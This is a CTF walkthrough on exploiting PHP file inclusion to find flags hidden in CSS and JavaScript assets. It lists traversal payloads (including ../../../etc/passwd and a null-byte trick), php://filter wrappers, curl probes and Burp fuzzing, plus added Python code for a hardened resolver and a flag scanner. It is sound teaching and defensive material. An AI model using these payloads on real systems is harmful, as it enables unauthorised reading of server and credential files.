Monday, July 7, 2025

PicoCTF On Includes – Exploiting File Inclusion Vulnerabilities

Introduction

File inclusion vulnerabilities in CTF competitions often hide flags in files that many overlook. While many participants concentrate on system files like /etc/passwd, the real treasure might be found in web application files such as CSS and JavaScript. This guide highlights a specific CTF challenge pattern where the flag is concealed in /style.css and /script.js files. 

PicoCTF file inclusion vulnerability walkthrough

The Challenge Pattern

Understanding the Setup 

In many CTF web challenges, you will encounter a file inclusion vulnerability where the application includes files based on user input: 

```php
<?php
$page = $_GET['page'];
include($page);
?>
```

The Hidden Asset Strategy 

While most players immediately try: 

```
?page=../../../etc/passwd
?page=../../../flag.txt
?page=config.php
```

The real flag might be hiding in plain sight within the web application's own files. 


Target Files: style.css and script.js 


Why These Files? 

style.css and script.js are ideal hiding spots because: 

- They are real web application files 

- Most attackers skip them, thinking they are harmless 

- They can contain comments with flags 

- They are often readable through file inclusion 

- They do not trigger security filters 

 

Common Locations

CSS:

- /style.css
- /css/style.css
- /assets/css/style.css
- /static/css/style.css
- ./style.css

JavaScript:

- /script.js
- /js/script.js
- /assets/js/script.js
- /static/js/script.js
- ./script.js

 

Exploitation Techniques 

Direct File Inclusion 

```
?page=style.css
?page=script.js
?page=./style.css
?page=./script.js
```

 

Directory Traversal to Web Root 

```
?page=../style.css
?page=../script.js
?page=../../style.css
?page=../../script.js
```

 

Using PHP Wrappers 

```
?page=php://filter/convert.base64-encode/resource=style.css
?page=php://filter/convert.base64-encode/resource=script.js
```

This technique is useful when: 

- The files might be processed as PHP 

- You need to see the raw content 

- Special characters are being filtered 

 

Flag Hiding Patterns 

In CSS Comments 

```css
/* FLAG{css_files_can_hide_secrets} */
body {
    background-color: #f0f0f0;
    font-family: Arial, sans-serif;
}

.header {
    /* Another common spot: FLAG{hidden_in_css_rules} */
    background: url('data:image/svg+xml;base64,RkxBR3toaWRkZW5faW5fYmFzZTY0fQ==');
}
```

 

In JavaScript Comments 

```javascript
// FLAG{javascript_comments_are_goldmines}
function validateForm() {
    var flag = "FLAG{stored_in_js_variables}";
    // TODO: Remove this flag before production
    return true;
}

/*
Multi-line comment with flag:
FLAG{multiline_comments_work_too}
*/
```

 

Encoded in CSS/JS 

```css
/* Base64 encoded flag in CSS */
.flag::before {
    content: "RkxBR3tlbmNvZGVkX2luX2Nzc30="; /* FLAG{encoded_in_css} */
}
```

```javascript
// ROT13 encoded flag
var secret = "SYNT{ebg13_rapbqrq_va_wf}"; // FLAG{rot13_encoded_in_js}
```

 

Systematic Approach 


1. Identify the Include Vulnerability

   First, confirm you have file inclusion:

   ```
   ?page=index.php  # Should work
   ?page=nonexistent.php  # Should error
   ```

2. Check for Web Assets

   Try the most common web files:

   ```
   ?page=style.css
   ?page=script.js
   ?page=main.css
   ?page=app.js
   ```

3. Explore Different Paths

   ```
   # Current directory
   ?page=./style.css
   ?page=./script.js

   # Parent directories
   ?page=../style.css
   ?page=../script.js

   # Common web directories
   ?page=css/style.css
   ?page=js/script.js
   ?page=assets/style.css
   ?page=static/script.js
   ```

4. Use PHP Wrappers if Needed

   ```
   ?page=php://filter/convert.base64-encode/resource=style.css
   ?page=php://filter/convert.base64-encode/resource=script.js
   ```

 

Tools and Techniques 


Manual Testing with curl 

```bash
# Test direct inclusion
curl "http://target.com/vuln.php?page=style.css"
curl "http://target.com/vuln.php?page=script.js"

# Test with different paths
curl "http://target.com/vuln.php?page=../style.css"
curl "http://target.com/vuln.php?page=css/style.css"
```

Using Browser Developer Tools 

- Open the challenge page normally 

- Check the Network tab for loaded CSS/JS files 

- Note the file paths 

- Try including those same files through the vulnerability 

 

Burp Suite Integration 

- Send the vulnerable request to Repeater 

- Create a list of common asset filenames 

- Use Burp's Intruder to fuzz the page parameter 

- Look for successful responses with different content 

 

Common File Variations 

CSS Files 

- style.css 

- main.css 

- app.css 

- theme.css 

- custom.css 

- bootstrap.css 

- styles.css 

 

JavaScript Files 

- script.js 

- main.js 

- app.js 

- custom.js 

- jquery.js 

- bootstrap.js 

- scripts.js 

 

Real CTF Example 

Challenge Setup 

```php
<?php
$page = $_GET['page'] ?? 'home';
include($page . '.php');
?>
```

Solution Path 

- Notice the .php extension is automatically added 

- Try: ?page=style.css (becomes style.css.php) 

- Try: ?page=style.css%00 (null byte, older PHP) 

- Try: ?page=../style.css (directory traversal) 

- Success with: ?page=../style.css%00 
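The server-side checks that either `include()` snippet in this post is missing, written here as an added example in Python rather than PHP (it is not code from picoCTF or from this post). It models an allowlist-based page resolver beside the unchecked `$page . '.php'` concatenation, so you can see where each request value from this post would end up under both. The web root, pages directory, allowlist and all function names are constructed for the example; nothing here touches a real filesystem.

```python
import posixpath
from urllib.parse import unquote

# Constructed layout for the model: a web root whose includable pages live in
# one subdirectory. Paths are handled with posixpath so the model behaves the
# same on any platform; nothing here touches the real filesystem.
WEB_ROOT = "/var/www/html"
PAGES_DIR = posixpath.join(WEB_ROOT, "pages")
ALLOWED_PAGES = frozenset({"home", "about", "contact"})  # constructed allowlist


def naive_target(page):
    """Path that include($page . '.php') would open with no validation at all.

    This only shows the filesystem view: a real PHP include would hand a
    php:// value to the stream wrapper instead of treating it as a path.
    """
    return posixpath.normpath(posixpath.join(PAGES_DIR, unquote(page) + ".php"))


def is_inside(path, directory):
    """True if path lies inside directory after normalisation."""
    path = posixpath.normpath(path)
    directory = posixpath.normpath(directory)
    return posixpath.commonpath([path, directory]) == directory


def safe_target(page):
    """Resolve page to a file under PAGES_DIR, or raise ValueError saying why not."""
    name = unquote(page)
    if "\x00" in name:
        raise ValueError("NUL byte in page name")
    if "://" in name:  # php://, data://, http:// and other stream wrappers
        raise ValueError("stream wrapper in page name")
    if name not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist")
    target = posixpath.normpath(posixpath.join(PAGES_DIR, name + ".php"))
    # Defence in depth: an allowlisted name must still resolve inside PAGES_DIR.
    # Real code should also resolve symlinks (os.path.realpath) before this check.
    if not is_inside(target, PAGES_DIR):
        raise ValueError("resolved outside the pages directory")
    return target


def classify(page):
    """Summarise how the hardened resolver treats one page parameter."""
    try:
        return "ok:" + safe_target(page)
    except ValueError as err:
        return "rejected:" + str(err)


if __name__ == "__main__":
    # The request values from this post, compared under both resolvers.
    for page in ("home", "style.css", "../style.css", "../style.css%00",
                 "php://filter/convert.base64-encode/resource=style.css"):
        print(f"{page!r:60} naive -> {naive_target(page)!r}")
        print(f"{'':60} safe  -> {classify(page)}")
```

The PHP equivalent of `safe_target` is a strict `in_array($page, $allowed, true)` check followed by `realpath()` and a prefix comparison against the pages directory; the allowlist does the real work, and the path check only catches mistakes in the allowlist itself. The model rejects NUL bytes explicitly because the challenge's null-byte trick depends on older PHP; current PHP refuses filenames containing NUL on its own.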

 

Flag Location 

```css
/* /style.css */
body {
    margin: 0;
    padding: 0;
    /* FLAG{css_inclusion_ftw} */
}
```

 

Pro Tips 

1. Check Both Files

   Always check both CSS and JS files. Flags might be split between them or one might be a distraction.

2. Look for Patterns

   ```css
   /* Part 1: FLAG{this_is_only_ */
   /* Part 2: half_of_the_flag} */
   ```

3. Decode Everything

   Look for base64, hex, or other encoded strings in the files.

4. Check File Timestamps

   Sometimes the modification time provides hints about which files were changed recently.

 

Quick Reference 

Essential Payloads 

```
?page=style.css
?page=script.js
?page=../style.css
?page=../script.js
?page=css/style.css
?page=js/script.js
?page=php://filter/convert.base64-encode/resource=style.css
?page=php://filter/convert.base64-encode/resource=script.js
```

Flag Search Patterns 

- Look for FLAG{ in comments 

- Check for base64 encoded strings 

- Search for unusual CSS properties or JS variables 

- Examine data URIs in CSS 
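A small scanner that applies the search patterns above, the "Decode Everything" tip and the split-flag pattern from the Pro Tips to asset text you have already retrieved, added here as an example in Python (it is not part of the original post or of any picoCTF challenge). The sample CSS and JS are constructed from the snippets shown earlier in this post, plus one hex-encoded string made up for the example; the regexes, function and variable names are the example's own, and it goes slightly beyond the post by also trying hex decoding.

```python
import base64
import codecs
import re

# Constructed sample assets, assembled from the snippets shown earlier in this
# post (plaintext comments, the base64 data URI, the ROT13 string, the split
# flag) plus one hex-encoded string made up for this example.
SAMPLE_CSS = """\
/* FLAG{css_files_can_hide_secrets} */
body {
    background-color: #f0f0f0;
    font-family: Arial, sans-serif;
}
.header {
    background: url('data:image/svg+xml;base64,RkxBR3toaWRkZW5faW5fYmFzZTY0fQ==');
}
.flag::before { content: "RkxBR3tlbmNvZGVkX2luX2Nzc30="; }
/* Part 1: FLAG{this_is_only_ */
/* Part 2: half_of_the_flag} */
"""

SAMPLE_JS = """\
// FLAG{javascript_comments_are_goldmines}
function validateForm() {
    var flag = "FLAG{stored_in_js_variables}";
    return true;
}
var secret = "SYNT{ebg13_rapbqrq_va_wf}";
var hexed = "464c41477b6865785f696e5f6a737d";
"""

FLAG_RE = re.compile(r"FLAG\{[A-Za-z0-9_]+\}")
# Long runs of base64 or hex characters are decode candidates; the minimum
# lengths keep ordinary identifiers and colour codes such as #f0f0f0 out.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
HEX_RE = re.compile(r"\b[0-9a-fA-F]{20,}\b")
# An opening fragment is FLAG{... that stops without its closing brace; a
# closing fragment is an identifier run ending in '}' that is not itself the
# body of a complete FLAG{...}.
OPEN_FRAG_RE = re.compile(r"FLAG\{[A-Za-z0-9_]*(?=[^A-Za-z0-9_}])")
CLOSE_FRAG_RE = re.compile(r"(?<![{A-Za-z0-9_])[A-Za-z0-9_]+\}")


def _decoded_views(text):
    """Yield the plaintext plus every decoding of it worth searching."""
    yield text
    yield codecs.decode(text, "rot_13")
    for cand in B64_RE.findall(text):
        try:
            yield base64.b64decode(cand, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text once decoded
    for cand in HEX_RE.findall(text):
        try:
            yield bytes.fromhex(cand).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue


def find_flags(text):
    """Return every complete FLAG{...} found in the text or in any decoding of it."""
    found = set()
    for view in _decoded_views(text):
        found.update(FLAG_RE.findall(view))
    return sorted(found)


def join_split_flag(text):
    """Reassemble a flag split across two comments, or return None."""
    opener = OPEN_FRAG_RE.search(text)
    if opener is None:
        return None
    closer = CLOSE_FRAG_RE.search(text, opener.end())
    if closer is None:
        return None
    return opener.group(0) + closer.group(0)


if __name__ == "__main__":
    for name, body in (("style.css", SAMPLE_CSS), ("script.js", SAMPLE_JS)):
        print(name, find_flags(body), join_split_flag(body))
```

Feed `find_flags` the body of each asset you retrieved, then read the remaining comments by hand: the scanner only recognises the `FLAG{` prefix, single-layer base64, hex and ROT13, so a flag under a different prefix or a double encoding still needs eyes on the file.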

 

Conclusion 

Don't overlook the obvious. While system files get a lot of attention in file inclusion challenges, web application assets like CSS and JavaScript files can be treasure troves for hidden flags. They are real files that don't trigger security alarms but may hold valuable information. 

The key lesson is to always examine style.css and script.js when you face file inclusion vulnerabilities in CTF challenges. Other participants often miss these files, giving you a competitive edge. 

Remember, in CTF competitions, the simplest solution is often the correct one, and flags tend to hide in plain sight.
